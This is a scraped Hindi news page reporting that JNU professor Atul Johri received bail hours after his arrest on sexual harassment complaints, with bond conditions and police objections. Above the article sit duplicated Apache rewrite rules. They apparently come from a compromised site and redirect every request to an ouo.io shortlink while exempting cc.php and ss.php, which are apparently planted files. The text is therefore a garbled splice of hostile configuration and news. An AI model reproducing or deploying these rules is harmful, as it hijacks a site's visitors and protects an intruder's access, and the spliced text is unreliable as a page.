
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 749
Nextनई दिल्ली। यौन उत्पीड़न के मामले में गिरफ्तार जवाहरलाल नेहरू विश्वविद्यालय के प्रोफेसर अतुल जौहरी को गिरफ्तारी के कुछ घंटों बाद ही जमानत मिल गई। आपको बता दें कि कुछ छात्राओं द्वारा प्रोफेसर पर यौन उत्पीड़न के आरोप लगाकर छात्र, प्रोफेसर और महिला अधिकार संगठन उनकी गिरफ्तारी की मांग कर रहे थे। दिल्ली पुलिस के मुख्य प्रवक्ता दीपेन्द्र पाठक ने बताया कि वसंत कुंज थाने में तीन घंटे तक पूछताछ के बाद जौहरी को गिरफ्तार कर लिया गया। लाइफ साइंसेस विभाग के जौहरी को ड्यूटी मजिस्ट्रेट ऋतु सिंह की अदालत में पेश किया गया। मजिस्ट्रेट ने जौहरी की जमानत की अर्जी मंजूर करते हुए प्रोफेसर को उनके खिलाफ दर्ज आठ प्राथमिकियों में प्रत्येक के लिए 30-30 हजार रुपए का मुचलका भरने का आदेश दिया।
प्रोफेसर ने जमानत याचिका दायर करते हुए कहा कि जेल भेजे जाने से उनका करियर बर्बाद हो जाएगा। पुलिस के अधिकारी ने बताया, दिल्ली पुलिस ने जमानत याचिका का विरोध किया, क्योंकि शिकायतकर्ताओं ने आरोपी द्वारा धमकाए जाने की शंका जाहिर की क्योंकि उनके पास जेएनयू में विभिन्न प्रशासनिक पद हैं। उन्होंने बताया, दोनों पक्षों को सुनने के बाद अदालत ने इस शर्त पर आरोपी को जमानत दी कि वह किसी भी तरह से जांच को प्रभावित करने या शिकायतकर्ताओं को धमकाने का काम नहीं करेंगे।